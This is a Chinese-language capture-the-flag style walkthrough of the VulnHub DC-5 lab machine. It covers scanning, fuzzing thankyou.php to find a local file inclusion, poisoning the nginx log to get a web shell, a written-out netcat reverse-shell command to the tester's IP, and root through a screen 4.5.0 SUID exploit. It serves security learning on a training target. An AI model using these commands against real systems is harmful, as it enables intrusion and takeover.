• vulnhub 之 dc 5


    0x00  前言 

      我只能说万物都可fuzz,心细则挖天下。

    0x01   流水

    目标发现

    netdiscover

     端口扫描

    nmao -p- -A 192.168.5.58

     开了 80 60777 111

    60777和111端口访问不了,不知道是干嘛用的,暂时放下不表

    访问80端口再进行一个信息收集

    1.cms 无

    2.目录扫描

    一个一个得去访问这些文件,菜能发现猫腻。ps:真的需要细心,当然我是喵wp知道得

    所有文件基本都能从页面直接访问道,唯独footer.php很不一样,

     一个页脚文件,而且每次刷新年份都会变,那么前面得页脚会不会是包含这个文件来显示得呢?

    查找每个文件,发现每个页脚都是固定得不会变,只有再留言提交后弹出得thankyou.php会跟着刷新而变动

     判断这里有一个包含,但是不知道现在这个包含是写死了的还是 通过变量传输,如果是通过变量传输得话就可能存在文件包含漏洞。这个时候,久去fuzz.

    尝试下没用过得工具 wfuzz

    wfuzz -w /root/dic/discovery/little_var.txt http://192.168.5.58/thankyou.php?FUZZ=index.php

    找到了一个,去浏览器看一看

     果然是存在本地包含漏洞 (LFI)

    接下来用文件包含去读一读文件

     用字典扫一扫linux文件,比较尴尬字典不够全,没有扫出来日志文件,又跑去看wp

    nginx得日志文件

    他将我们得访问记录记录再日志里了,这样我们写入一句话通过文件包含去执行就可以getshell了

    写一句话

     之后用蚁剑连接虚拟终端反弹一个shell,并用python开启一个shell

    kali   nc  -lnvp  4444

    蚁剑  nc -e /bin/bash 192.168.5.54 4444

    python -c 'import pty;pty.spawn("/bin/bash")'

     

     接下来提权,suid提权

    查看可行得suid命令

     可以看到有screen 4.5.0   ,从漏洞库看有没有可用脚本

     耶!正好又有两个,拷到root目录然后拿到物理机通过蚁剑传到靶机 /tmp目录

    直接拷过去没有运行权限

     打开这个shell,跟着他得步骤来

     跟着他上面得命令和步骤跟着输入,先编译两个文件

    编译好后上传到靶机,然后跟着poc里面得步骤一步一步得再靶机输入命令就好

     拿到最终flag

    0x02 学到得东西

    1.suid提权

     参考:https://cloud.tencent.com/developer/article/1600994

  • 相关阅读:
    Algs4-2.1.23纸牌排序
    python字符串加颜色区别
    python学习之字典
    python学习之while语句
    python学习之字符串变量
    python学习之列表语法
    python简单实现用户表单登录
    python学习之安装模块
    python学习之认识字符串
    python学习之for语句
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13131684.html
Copyright © 2020-2023  润新知